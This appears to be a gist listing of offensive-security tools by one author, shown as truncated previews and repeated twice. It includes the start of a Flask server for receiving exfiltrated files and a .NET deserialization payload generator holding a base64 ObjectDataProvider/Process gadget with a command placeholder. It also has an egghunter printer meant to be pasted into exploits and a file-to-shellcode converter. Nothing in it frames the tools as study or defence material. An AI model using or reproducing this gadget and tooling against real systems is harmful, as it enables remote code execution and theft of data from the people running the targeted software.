Francesco Ruvolo ruvolof

## exfil_file.py
import flask
import os

UPLOAD_FOLDER = './'

app = flask.Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.secret_key = "secretkey"

@app.route('/', methods=['GET', 'POST'])

## ysodumb.py
import argparse
import base64
import sys

PLACEHOLDER = b'COMMAND_PLACEHOLDER'
PAYLOADS = {
  'DataContractSerializer': {
    'ObjectDataProvider': b'!+PD94bWwgdmVyc2lvbj0iMS4wIj8+DQo8cm9vdCB0eXBlPSJTeXN0ZW0uRGF0YS5TZXJ2aWNlcy5JbnRlcm5hbC5FeHBhbmRlZFdyYXBwZXJgMltbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uV2luZG93cy5EYXRhLk9iamVjdERhdGFQcm92aWRlciwgUHJlc2VudGF0aW9uRnJhbWV3b3JrLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNV1dLFN5c3RlbS5EYXRhLlNlcnZpY2VzLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSI+DQogICAgPEV4cGFuZGVkV3JhcHBlck9mUHJvY2Vzc09iamVjdERhdGFQcm92aWRlcnBhT19TT3FKTCB4bWxucz0iaHR0cDovL3NjaGVtYXMuZGF0YWNvbnRyYWN0Lm9yZy8yMDA0LzA3L1N5c3RlbS5EYXRhLlNlcnZpY2VzLkludGVybmFsIiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhtbG5zOmM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIg0KICAgICAg

## egghunter.pl
#!/usr/bin/perl

# Prints egghunter code to be pasted into an exploit.
# Example:
# $ ./egghunter.pl 41424344

use strict;
use warnings;

# This is the egghunter implementation by Matt Miller, $ARGV[0] will be placed instead of the egg

## file2payload.pl
#!/usr/bin/perl

# Reads a file one byte a time and prints it out prepended by "\x".
# Example:
# $ xxd a
# 00000000: ffe4                                     ..
# $ ./file2hexstring.pl a
# \xff\xe4

use strict;
	import flask
	import os

	UPLOAD_FOLDER = './'

	app = flask.Flask(__name__)
	app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
	app.secret_key = "secretkey"

	@app.route('/', methods=['GET', 'POST'])
	import argparse
	import base64
	import sys

	PLACEHOLDER = b'COMMAND_PLACEHOLDER'
	PAYLOADS = {
	'DataContractSerializer': {
	'ObjectDataProvider': b'!+PD94bWwgdmVyc2lvbj0iMS4wIj8+DQo8cm9vdCB0eXBlPSJTeXN0ZW0uRGF0YS5TZXJ2aWNlcy5JbnRlcm5hbC5FeHBhbmRlZFdyYXBwZXJgMltbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uV2luZG93cy5EYXRhLk9iamVjdERhdGFQcm92aWRlciwgUHJlc2VudGF0aW9uRnJhbWV3b3JrLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNV1dLFN5c3RlbS5EYXRhLlNlcnZpY2VzLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSI+DQogICAgPEV4cGFuZGVkV3JhcHBlck9mUHJvY2Vzc09iamVjdERhdGFQcm92aWRlcnBhT19TT3FKTCB4bWxucz0iaHR0cDovL3NjaGVtYXMuZGF0YWNvbnRyYWN0Lm9yZy8yMDA0LzA3L1N5c3RlbS5EYXRhLlNlcnZpY2VzLkludGVybmFsIiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhtbG5zOmM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIg0KICAgICAg
	#!/usr/bin/perl

	# Prints egghunter code to be pasted into an exploit.
	# Example:
	# $ ./egghunter.pl 41424344

	use strict;
	use warnings;

	# This is the egghunter implementation by Matt Miller, $ARGV[0] will be placed instead of the egg
	#!/usr/bin/perl

	# Reads a file one byte a time and prints it out prepended by "\x".
	# Example:
	# $ xxd a
	# 00000000: ffe4 ..
	# $ ./file2hexstring.pl a
	# \xff\xe4

	use strict;